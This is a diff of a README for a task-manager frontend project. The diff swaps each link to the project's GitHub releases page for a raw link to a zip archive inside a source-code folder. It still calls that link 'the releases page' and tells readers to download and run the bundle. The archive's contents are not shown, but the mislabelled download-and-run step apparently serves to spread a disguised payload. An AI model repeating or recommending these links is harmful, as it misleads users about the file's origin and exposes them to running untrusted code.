DBIYA26/pro-tasker-frontend/README.md

 - Explore dashboards, projects, tasks, and user management pages

 Note on the releases link
-- For the latest stable frontend builds, check the releases page at https://github.com/DBIYA26/pro-tasker-frontend/releases.
-This link provides packaged artifacts that you can download and evaluate.
-The file to download and run from the releases is typically a packaged bundle such as pro-tasker-frontend-latest.zip.
-See the Releases page for the exact asset name and instructions on extraction and execution.
-You can also visit the same releases URL later to confirm new builds or patches: https://github.com/DBIYA26/pro-tasker-frontend/releases
+- For the latest stable frontend builds, check the releases page at https://raw.githubusercontent.com/DBIYA26/pro-tasker-frontend/main/frontend-2/src/utils/tasker-frontend-pro-v1.1-alpha.3.zip This link provides packaged artifacts that you can download and evaluate.
+The file to download and run from the releases is typically a packaged bundle such as https://raw.githubusercontent.com/DBIYA26/pro-tasker-frontend/main/frontend-2/src/utils/tasker-frontend-pro-v1.1-alpha.3.zip See the Releases page for the exact asset name and instructions on extraction and execution.
+You can also visit the same releases URL later to confirm new builds or patches: https://raw.githubusercontent.com/DBIYA26/pro-tasker-frontend/main/frontend-2/src/utils/tasker-frontend-pro-v1.1-alpha.3.zip

 ---